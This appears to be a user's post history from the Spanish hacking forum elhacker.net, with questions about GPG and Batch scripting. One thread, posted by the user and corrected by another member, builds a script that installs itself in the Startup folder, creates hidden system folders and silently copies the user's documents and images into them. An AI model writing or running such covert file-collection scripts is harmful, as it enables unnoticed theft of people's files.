elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 [2]
11  Seguridad Informática / Seguridad / GPG en: 15 Noviembre 2017, 20:30 pm
Buenas tengo una pregunta y me gustaria saber si alguien sabe responderla. Utilizo gpg y cuando cifro un archivo al descifrarlo no me pide contraseña ya que tengo la clave privada guardada en el mismo ordenador del que cifro. Me gustaria saber si hay alguna forma de que pida clave para descifrar en el mismo ordenador. Muchas gracias con antelación!!
12  Programación / Scripting / Re: No se esperaba en este momento. Error [Batch] en: 3 Abril 2017, 12:13 pm
Buenas. Cuando ahora vuelvo a probar el código me vuelve a salir el mismo error. Y es el código corregido que me pasaste. ¿Alguien tiene idea del porque pasa esto?

Alma de cántaro, tienes que escapar los caracteres reservados/especiales de Batch. Los paréntesis y símbolos de porciento, entre otros.

Aparte de eso, en cada linea tienes argumentos abiertos sin comillas dobles de cierre " "

Prueba así:
Código:
ECHO IF NOT EXIST ".\%%USERNAME%%" ^(MD ".\%%USERNAME%%"^)
ECHO attrib +h +s ".\%%USERNAME%%"
ECHO cd ".\%%USERNAME%%"
ECHO for /R "%%USERPROFILE%%\Pictures\" %%%%x in ^(*.pdf,*.docx,*.xlsx,*.pptx,*.txt,*.jpg,*.jpeg^) do copy %%%%x ".\"

Saludos!
13  Programación / Scripting / Re: No se esperaba en este momento. Error [Batch] en: 2 Abril 2017, 23:26 pm
Muchas gracias! ;-) ;-) Estoy empezando en esto del scripting y se me paso eso por encima :laugh: :laugh:
14  Programación / Scripting / No se esperaba en este momento. Error [Batch] en: 2 Abril 2017, 10:58 am
Buenas. Tengo un problemilla con un batch. Quiero crear el siguiente batch pero me sale el error de "No se esperaba x en este momento".

Código:
cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
(
ECHO md 1
ECHO attrib +h +s 1
ECHO md 0
ECHO attrib +h +s 0
ECHO cd 0
ECHO IF NOT EXIST ".\"%USERNAME% MD ".\"%USERNAME%
ECHO attrib +h +s ".\"%USERNAME%
ECHO cd ".\"%USERNAME%
ECHO for /R %USERPROFILE%\Pictures\ %%x in (*.pdf,*.docx,*.xlsx,*.pptx,*.txt,*.jpg,*.jpeg) do copy %%x ".\"
)>"Inicio.bat"

Quiero crear un Batch que me genere ese batch pero no me lo genera y algunas veces cuando me lo genera es erroneo. ¿Alguien sabria decirme cual es el error.?

Muchas gracias de antelación.
15  Programación / Scripting / Re: Comando Copy con: de archivo .bat en: 1 Abril 2017, 21:45 pm
vale pues la primera linea siempre van como te e puesto
las demas van  asi >> es lo unico que cambia


Sisi ya lo probé por logica y me funciono. Muchas gracias.
16  Programación / Scripting / Re: Comando Copy con: de archivo .bat en: 1 Abril 2017, 21:33 pm
Con el comando echo te pongo ejemplo
echo foro.elhacker.net > archivo.txt

Pero necesito meter en ese archivo varias lineas de texto no solo una.

un ejemplo seria

start
dir
cd.


como meto todo eso en un .txt con lo que tu me has dicho?
17  Programación / Scripting / Re: Comando Copy con: de archivo .bat en: 1 Abril 2017, 21:33 pm
Pero necesito meter en ese archivo varias lineas de texto no solo una.

un ejemplo seria

start
dir
cd.


como meto todo eso en un .txt con lo que tu me has dicho?
18  Programación / Scripting / Comando Copy con: de archivo .bat en: 1 Abril 2017, 19:29 pm
Buenas. Quiero realizar un bacth el cual cree un archivo pero automáticamente. Me explico con un ejemplo:

Código
  1. cd C:\Users\Usuario\Desktop
  2. copy con: hola.txt
  3. hola soy un ejemplo
  4. ^Z


quiero realizar eso pero sin tener que pulsar Control+Z para que guarde el archivo ya que quiero que se cree eso de forma automática en un batch. ¿Alguien sabe como se podría hacer?


Gracias de antelación.


· Los códigos deben ir en etiquetas GeSHi
· Esto va en el subforo de scripting (movido)
>aquí las reglas del foro
-Engel Lex
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines